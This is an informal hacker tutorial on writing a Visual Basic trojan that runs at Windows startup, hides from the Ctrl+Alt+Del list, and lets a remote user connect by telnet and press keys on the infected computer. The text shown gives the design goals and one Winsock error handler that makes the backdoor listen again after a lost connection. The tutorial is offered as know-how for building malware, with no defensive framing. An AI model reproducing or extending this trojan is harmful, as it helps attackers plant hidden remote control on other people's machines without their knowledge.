Basic Trojan in Visual Basic
Basic Trojan in Visual Basic
by: swampy
[email protected]
mirc: #hackers, #ereased #hacking
---------------------------------
about:
in this litle tutorial i will learn you to make a small trojan that starts everytime
windows is started. on more thing, you cant se it in the ctrl + alt + del screen.
in the code all the green text is comments, you don´t have to include them in the
code. when someone has opened the trojan you can connect to it with telnet, and
when you are connected you can press a key and then the infected computer also
presses that key. hope you have fun with your new knowlege... :)
start programming:
start with adding a new component into your project. add the component that is named
"microsoft winsock controls". now i wont tell you anything else you have to putt into
the form.
private sub winsock1_error(byval number as integer, description as string, byval scode as long, byval
source as string, byval helpfile as string, byval helpcontext as long, canceldisplay as boolean)
'if an error accour and the conection is lost, then this tells the winsock to listen again
winsock1.close
winsock1.listen
end sub